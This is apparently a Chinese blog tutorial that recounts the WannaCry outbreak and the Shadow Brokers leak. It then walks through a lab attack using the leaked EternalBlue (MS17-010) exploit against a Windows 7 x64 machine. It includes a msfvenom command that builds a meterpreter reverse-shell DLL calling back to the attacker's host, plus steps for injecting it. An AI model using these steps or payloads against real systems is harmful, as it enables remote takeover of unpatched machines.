我估摸著這兩天大家都應該被壹款老舊的勒索病毒刷爆了朋友圈,可能還有些同學不幸中招,那麽是什麽原因導致了這款勒索病毒如此猖狂?
這件事情還得從壹個黑客組織說起,這個組織叫做Equation Group(方程式組織),這壹黑客團夥與美國國家安全局(NSA)的關系壹直十分密切。而且外界也普遍認為,Equation Group是美國國家安全局的壹個下屬部門。很多安全研究專家表示,Equation Group這壹黑客組織所擁有的技術無論是從復雜程度還是從其先進程度來看,都已經超越了目前絕大多數的黑客團體,而且該黑客組織已經活躍了二十多年了。
然而,這個黑客組織被另壹黑客團夥“The Shadow Brokers”(影子經紀人)給入侵了……(就是這麽任性)。“The Shadow Brokers”(影子經紀人)自稱他們從Equation Group手裏拿到了很大壹部分黑客工具,決定公開叫賣。
本以為能狠賺壹筆,但實際上卻沒有人鳥他們,就是這麽神奇。於是The Shadow Brokers決定公開壹部分有價值的工具,其中“eternalblue”(永恒之藍)就是其中之壹(漏洞編號ms17-010)。那麽永恒之藍這個漏洞利用程序究竟牛X到什麽地步呢?這麽說吧,除了windows 10以外,windows系列的系統無壹能夠幸免。
於是乎,永恒之藍漏洞利用程序+wannacry勒索軟件程序造就了迄今為止最巨大的勒索交費活動,影響到近百個國家上千家企業及公***組織。
接下來,滿足小白的好奇心,壹起探究The Shadow Brokers公布的永恒之藍漏洞利用程序,如何利用ms17-010攻陷壹臺64位windows 7。
攻擊機1(192.168.1.101):
裝有metasploit的linux
攻擊機2(192.168.1.137):
可以運行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12
靶機(192.168.1.140):
windows 7 x64(開放139、445端口)
利用The Shadow Brokers工具箱中的永恒之藍利用程序攻陷靶機
修改後的路徑與目錄當前的路徑壹致
壹路回車,直到輸入項目名稱處,輸入項目名稱
繼續回車
繼續壹路回車,直到選擇模式選擇1
繼續壹路回車,直至攻擊完成
相關命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll
壹路回車,直到選擇系統架構,由於我們要攻擊的主機是win 7 x64位,故這裏選擇1
選擇2 dll註入
Ps:喜歡的留個贊b( ̄▽ ̄)d ~也可以關註專題:黑客師。